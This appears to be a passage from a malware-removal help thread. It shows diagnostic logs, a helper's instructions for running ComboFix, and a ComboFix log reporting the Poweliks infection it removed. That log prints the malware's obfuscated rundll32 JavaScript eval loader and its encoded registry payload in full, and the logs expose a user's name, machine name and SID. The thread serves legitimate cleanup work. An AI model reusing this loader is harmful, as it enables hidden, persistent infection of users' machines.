A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\32.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\FI\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\16.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_24331\CRX_INSTALL\128.PNG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ET\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES_419\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\ES\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/25/2014 09:26:47 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\TEMP\SCOPED_DIR_1844_26067\CRX_INSTALL\_LOCALES\EN_US\MESSAGES.JSON> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
 
System errors:
=============
Error: (08/25/2014 09:53:10 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)
 
Error: (08/25/2014 09:41:01 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)
 
Error: (08/25/2014 09:31:53 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)
 
Error: (08/25/2014 09:21:25 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (08/25/2014 09:20:08 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
Error: (08/25/2014 09:18:52 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AVGIDSDriver
AVGIDSShim
 
Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: vToolbarUpdater%%2
 
Error: (08/25/2014 09:18:51 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: AVGIDSAgentAVGIDSDriver%%31
 
Error: (08/25/2014 08:23:12 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (08/25/2014 08:19:07 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
 
Microsoft Office Sessions:
=========================
Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-08-25 09:48:31.237
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:31.054
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.886
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.700
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.286
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:30.009
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:29.734
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:48:29.432
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:47:50.973
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-25 09:47:50.762
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 65%
Total physical RAM: 3060.46 MB
Available physical RAM: 1043.32 MB
Total Pagefile: 6355.21 MB
Available Pagefile: 4190.75 MB
Total Virtual: 2047.88 MB
Available Virtual: 1907.04 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:221.74 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive g: (IT Drive) (Fixed) (Total:465.76 GB) (Free:188.98 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: BADAE880)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

ComboFix failed to delete the infection, probably due to SpyBot working in the background. I recommend uninstalling it, as this program is too weak for today's security expectations.

Also delete your version of ComboFix (simply move it to your Recycle Bin) and obtain a fresh one from the provided link before the next scan.



SpyBot S&D Warning

MVPS.org is no longer recommending SpyBot S&D due to very poor testing results (scroll down and read under Freeware Antispyware Products).
My advice is to get rid of this program. To do so:

  • Press the Windows key + R on your keyboard at the same time. Type appwiz.cpl and click OK.
  • Search for SpyBot, right-click the entry and click Uninstall.

Please do it, because it may hinder the removals.

Scan with ComboFix

This is a very powerful tool that should be used only if advised by a Malware Analyst.
Do not run ComboFix on your own!


Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.
Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.
If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on the ComboFix icon and select Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.
If you encounter any issues with your internet connection after running ComboFix, please visit this link.
If an error about an operation on a key marked for deletion appears after running the tool, please reboot your machine.
Don't forget to re-enable your previously switched-off protection software!


Programs and Features does not show a Spybot entry. I have also looked for it in the Start Menu as well as C:\Program Files. There are no references to Spybot in either of these locations either. Since this is a 32-bit OS, there is no Program Files (x86). So, no need to look for Spybot there.

 

Any recommendations?


Here we go. Combofix log:

 

ComboFix 14-08-24.01 - savas.kyriakidis 08/25/2014  10:55:04.4.2 - x86
Running from: G:\ComboFix.exe
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         [encoded data omitted]
J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\F"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-1GIo]`sI]#w&]M^U( ]Gp`s25x1*KZ2Tl`N5i`s?mpNj.M9-j!"W9!BfCo^Si2&T.Zw5}`sAji9Wt!9\mM1dI`99:39U.V.}pjs9i`.&"T.aDF}VwY"jB&]iDWHsw9lAVo]`1\jTjAi3D!".B.K`s&UjaB4y1jI82TP`.x5TVK4F96C(9L5j]xPT^WH:w9lV,J}`s}]ias^MgBmFslK`q!"j\"q.\l tsi`s&Uq1Gp.g!C(9L"joAjT9x[!D}ljV$]Z}\PixAj(9]Ij[;+AFA"Vw.IA9-lZ1G[2NA5TVgI ^-t.x\5HM}p9xiM8op0.$]As&ii9x8 w/mM1Np`s&`j4tIoV3p^VK]yV&Uis;jg!}L"(53]\iixfjjDrlq,o}j9f[igxi(g35([xKVV&5D#?A.$KoAu]VV\\TY$?jwot 9yd!3!jTXA}.wF}8s%]om!jT"W#C4K5.VS.VtIUj3Ijs$p:I%}qVA`i.dMXAPjwAgM[sjh9Ye ^GIZsB}qVr}""Y 3&T:jLHI Nf5j"XmoVhSZoX\A9|qo}s?V4U}jwA5x[k\+"/e l648wpn_1H8#I! 
Vw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA`2"]qNBp`s$}`sA5is~pj4iV^x:C^h]T^fJ!l/l`sU}`sA}iwA}jw$5s0IsVA9xa]qNBI:Apj`1A5is~pjw$}jwA5 3h#T^f}3l!l`sUn^9}tT^A}jw$5jo~p`sAUF4jqNBK:Apj`1M:V}ap9$}jwA5joA}iwA[K^!l`sG#w9}tT^L\s9B5!o~p`sA5jw$p`s35NApj`1q:V}ap^iiV^xUjoA}iwA}jw$p`s}\89}tT^D\s9B5!a}IsVA\!w$p`s$p`s$}`sq}iwap^iV^xUK)h#T^f}jw$p`s$}`sA}iAD\M8B5!X}IsVAmxajqNBp`s$}`sA5is~pj9}iF^xUKLh#T^fi3l!l`sU}`sA}iwA}jw$5tZ?sVAmF"jqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s!C^9}tTaX\s9B5!o~p`sAUV~jqNBp`s$}`ss5is~}!w$}jwA5&Lh#T^f}jw$p`sHt^9}tT^A}jw$5K#ZIsVA\!w$p`s$?.AOj`1A5is~pjg;iF^xUjoA}iwAi&"Fl`sU}`sA}ix&\M8B5!o~p`sAUaPqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw/?wwei0*k\s&6e39 U.so1qYk"F\/p`s$pjqz#NA.U3wyK~!CFaqU:aL\T8Aiy~ j8I.#0F1nV^Fi3j*:jo_1:Al"&4"KVFjmy9$}`sA"T5S5Lx.}.I6:(s5nV8*PM8jmy9$}^IK]p45i.\/U3aDj 1k5jw$p`}6HV1dPNALmT.~.L~dPFg.gjt}"jDe39fp`s$}0wk8sx/e Zq(M]wK V}j!lz.^tFm8s]}^1."i*:.3"][.aCCHA}iwA#V4 mwwoP Vl#TIh V\6(MHI.s6k(VxAjNfpqsp\qtlts}7534$[.aCCHA}iwAiKxG4w3z[wI3#"wr .4/9F2oj0Ntj&4dp`}/.ws }0wHmq9g.2w$}jws\Ma3]PwWe!4/4wwo Ak]q\n .1a(st2p^}.ts\Pj^jq.Z6Oi 1k5is~pjj6n.a("L$l##\FtM8d+qqzHoIl#"`hi8*9VVHmZsIj.xpjj}/?0Fjo.l"ft.pjw$}.jYj:XI\U4 eyx KwweCZsk\U4/P(aB9.2_+_1A5jw$j:qX?s9O8GAtjT}.5.4A82wC"M1A}iwA}j\UIs*fj`sAjpg&}?O$1x[xNbYl1Kg/1AsXK_V!}2IS}!NArs^+j.I6"32wCqAF}:OUI`Fe G9w6 wHnkDGI!o~p`s5(MOzNZV.I`FzijsS}isH+."+j g*IjAXep4ZjVzTrG}( _VIHo~Z}3kA:C[&}ZNn}2a1q."IZ2*PNpy9qAG?y4KjVx x(6[ 
9A}jw$pjoTjAt;i/R\Jy931CoHlq9A\!w$mUYUp`s$}`s(5#.Np9$}K\I9!HA}ixC?DXIGN/iZYA8o^v6Dtg]"l`wj\3gBpjVdHUYH 05\9Ts5lCjH}3wA5V]H3&*J&99?ZI3jNA2jp~sP9(5Kt".A2!5.wJ+`.4Iwwhi`sw"PHMIf9C]kR!9fsf}fI!PXO%jVm+}`9A}igsn.A.U3t2I`sAUj&XS2N9KAt3jNAA}3tHp3^(CkR\}s$A] wZt:\2p01$}`swjf"vjjl(9ls.k`935vg/1u%*?as$}`pcuit&}fw$}jw95l3\[T4Xiy"}4s5.[A}xFT82[ `*5 ^MmZs3"M"\}A1VKVI/#063j3Y;1?R-J!w&5!X3]3wZt gVp^9$}`2 6/DZH?R*d!o~pZ9ct2jop`s/I.}*]ZqFd"tApjw$]f49`24ItpjvtXD%S8qT}N3\[T&h}FA.t!4AKAq 9F"zIAI}5^w-^y11(Tt$S&1*}jwAnyB?trDAtMI*p02-}Z6&Ho~x]f"}g2}.j`};j:931 wGIyNh[b,29Ts~}2w5}L\&`!]&n3XXjL"/rU,f}NA2 pgsP(g((!BG;%\9!w$1 N]j_IfioV?("9\I.wo}jwsIj(Dn3wZ}.w/HwoT[A5D}f\qCM"Ttso7NG3c5.~(lj5"my3a\.Iw\+W7j:\g}?rht&hw}p9:tm`.?8ihh29|ji&*j&9$`c]kn2v35k~}nvy]+`s%j_9z:it p3w+ 0yty]w\o4&Jy~e1VV/[.I?[%^M6jl3mM^.H.AfU46Sym.KqF+HH%\nfInKK4$Hsx:}K$sHu~sP(\I89h6As|tU9A}jw35L]~.0m 9&4Ol:A]+UYX As29Ts~HMj9]f"5}2]*jPws}Fw2I N(ijNw[f9*CKA"gMV.H2NxtsTTp0V}IZ9oC`w25%3X1:1.\Vx:n!aji 9Xnj"++ApTjqo\[rR\ fwq:sBslV.*I!^op`,.w5q\.Vc"us0SF&T}3wA5jos}iwA}jX/l`sU}`sA}VwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$K:!kFPD4#^;9f\H8FN&Z"-mG!ArHt8i2Vy9!.DSVxq8x"w(iEj l!t(x-mw1s^ }we+jyJ3841xHK5q6N}Lau}oI3}q6stys!\i}7m3\q8:g!m1Ei!Ow8x"smboGty2oC+jX8:jdty(!}V6/&s\2m Iq5q6}^s,!\ 1Z|?SGt 5o5Z44}U^!t.D[(U68#`VE[9tXp?X8jjs!NGHXo?X8.`V;NGHz 8FNnjbK!^;[s~!1VTwFj0wJ3^;Ns,.tUo3^/S6HLA"tkAS+GphdZ"-m;3{|wYPno1!\ !!jxj;[M^Y\?X98U"V^:OAjy.z[sVLtptEPwz1 444w!v}39sNAIs4V.UeoIV"h,HIxj;e&"w( Xp8+^E[Mjz|;tUeUAF^+jX\y&;\MakqA1t(MXplq*V42N}^s,L5j3k|M9V(2zWq!B*[!j4p.ZdZ9X[V.4p#Z/ FjB(x}.H^!/qFjB4 p"H^!d 8.9(Up.HVZ2(Z44UX!iu"Xp?02|U3;jq* 8+DVFZ"AdZ]SSGb/tZSA|:Y15ysTeytG6PY^+M^Tv#*#rin'C "EU`aQJ,kna,^+U-=lE~ZS8#I)mmYm4`b )8Im^Wdnv#iKXQpAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-07-25 to 2014-08-25  )))))))))))))))))))))))))))))))
.
.
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-25 13:55 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-25 13:35 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-25 12:26 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 20:16 . 2014-08-25 15:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-25 14:49 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 20:51 . 2014-08-25 13:16 -------- d-----w- c:\programdata\IrfuqApivh
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
